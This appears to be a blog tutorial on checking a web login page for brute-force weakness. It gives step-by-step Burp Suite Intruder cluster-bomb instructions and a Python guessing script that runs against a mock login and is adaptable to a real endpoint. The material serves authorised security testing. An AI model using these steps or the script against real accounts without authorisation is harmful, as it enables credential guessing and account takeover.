How to check a web application’s login page for a brute-force vulnerability
3 min readOct 13, 2022
Steps to download and install Burp Suite:
- Download Burp Suite Community Edition.
Link: https://portswigger.net/burp/communitydownload
- Finish the installation of the downloaded Burp Suite on your system.
Steps for configuring Burp Suite with the web browser:
- Configure Burp Suite to work with an external browser, so that the browser’s traffic goes through Burp’s proxy listener (127.0.0.1:8080 by default).
Link: https://portswigger.net/burp/documentation/desktop/external-browser-config
Steps to brute force a login page:
- Open the target URL in the web browser.
- In Burp Suite, go to the Proxy tab and turn “Intercept” on.
- In the browser, enter some arbitrary details into the login page and submit the request.
- e.g. username “test” and password “test”.
- The captured request appears in the Proxy “Intercept” tab.
- Right-click the request to bring up the context menu.
- Click “Send to Intruder”.
- Go to the Intruder “Positions” tab.
- Clear the pre-set payload positions with the “Clear” button on the right of the request editor.
- Add the “username” and “password” parameter values as positions by highlighting each one and clicking “Add”.
- Change the attack type to “Cluster bomb” in the “Attack type” drop-down menu. Cluster bomb tries every payload from set 1 against every payload from set 2, so 50 usernames and 500 passwords mean 25,000 requests.
- Go to the “Payloads” tab.
- In “Payload sets”, make sure “Payload set” is “1” and “Payload type” is “Simple list”.
- In “Payload options”, enter some possible usernames. You can type them in manually or load a custom or pre-set list.
- Back in “Payload sets”, change “Payload set” to “2”.
- In “Payload options”, enter some possible passwords, again manually or from a custom or pre-set list.
- Click “Start attack”.
- In the “Intruder attack” window, sort the results using the column headers, e.g. by “Length” and by “Status”. Almost every guess fails in the same way, so the failed attempts share one status code and response length; a successful login usually stands out with a different status (often a 302 redirect instead of 200) and a different length.
- To confirm the brute force was successful, log in manually on the web application’s login page with the username and password you found.
- If the application locks the account, starts returning CAPTCHAs, or rate-limits you after a handful of attempts, note that too: that control is what makes a login page resistant to brute force, and its absence is the finding.
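The same cluster-bomb run and the “sort by Status and Length” step, as an added Python example that is not part of the original post and not Burp Suite’s own code. The target is a constructed in-memory stand-in (`fake_login`, with the made-up valid pair admin / Password1) so the script runs offline; to use it against an application you are authorised to test, replace `fake_login` with a function that sends the real POST and returns the status code and body length.

```python
"""Cluster-bomb login brute force in plain Python, mirroring Burp Intruder.

The target below is a constructed stand-in (fake_login); it is not any
real application's login handler.
"""
from collections import Counter
from itertools import product
from typing import Callable, Dict, List, Tuple

# Constructed mock of the target's login endpoint. Many web apps answer a
# failed login with 200 and the form again, and a successful login with a
# 302 redirect, so status and body length differ between the two cases.
VALID_CREDS = {("admin", "Password1")}  # assumption for the mock only
FAIL_BODY = "<html><body><form>Invalid username or password</form></body></html>"
OK_BODY = ""  # a redirect usually carries an empty body

Response = Tuple[int, int]  # (status code, content length)


def fake_login(username: str, password: str) -> Response:
    """Stand-in for POST /login; returns (status, length) like Intruder's table."""
    if (username, password) in VALID_CREDS:
        return 302, len(OK_BODY)
    return 200, len(FAIL_BODY)


def cluster_bomb(usernames: List[str], passwords: List[str],
                 send: Callable[[str, str], Response] = fake_login) -> List[Dict]:
    """Try every username with every password (Intruder's 'Cluster bomb').

    The request count is len(usernames) * len(passwords), which is why a
    lockout or rate-limit control on the target shows up quickly.
    """
    results = []
    for user, pwd in product(usernames, passwords):
        status, length = send(user, pwd)
        results.append({"username": user, "password": pwd,
                        "status": status, "length": length})
    return results


def sorted_results(results: List[Dict]) -> List[Dict]:
    """The same view as sorting the Intruder table by Status, then Length."""
    return sorted(results, key=lambda r: (r["status"], r["length"]))


def outliers(results: List[Dict]) -> List[Dict]:
    """Flag rows whose (status, length) differs from the dominant failure signature.

    Nearly every guess fails the same way, so the failed rows share one
    (status, length) pair; a successful login is the odd one out.
    """
    if not results:
        return []
    signature = Counter((r["status"], r["length"]) for r in results)
    dominant = signature.most_common(1)[0][0]
    return [r for r in results if (r["status"], r["length"]) != dominant]


def confirm(candidate: Dict,
            send: Callable[[str, str], Response] = fake_login) -> bool:
    """Re-send a flagged pair on its own: the manual 'log in to confirm' step."""
    status, _ = send(candidate["username"], candidate["password"])
    return status == 302


if __name__ == "__main__":
    # Constructed payload lists; in practice these come from a wordlist.
    users = ["admin", "test", "user"]
    passwords = ["test", "123456", "Password1", "admin"]
    rows = cluster_bomb(users, passwords)
    for r in sorted_results(rows):
        print(f"{r['status']}  {r['length']:4d}  {r['username']}:{r['password']}")
    for hit in outliers(rows):
        print("candidate:", hit["username"], hit["password"],
              "confirmed:", confirm(hit))
```

`outliers` keys on the most common (status, length) pair rather than on a fixed “302 means success” rule, because some applications answer a successful login with 200 and a different page; whatever the success response looks like, it is the signature that appears least often in the table.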
You’re done.
Happy Hacking!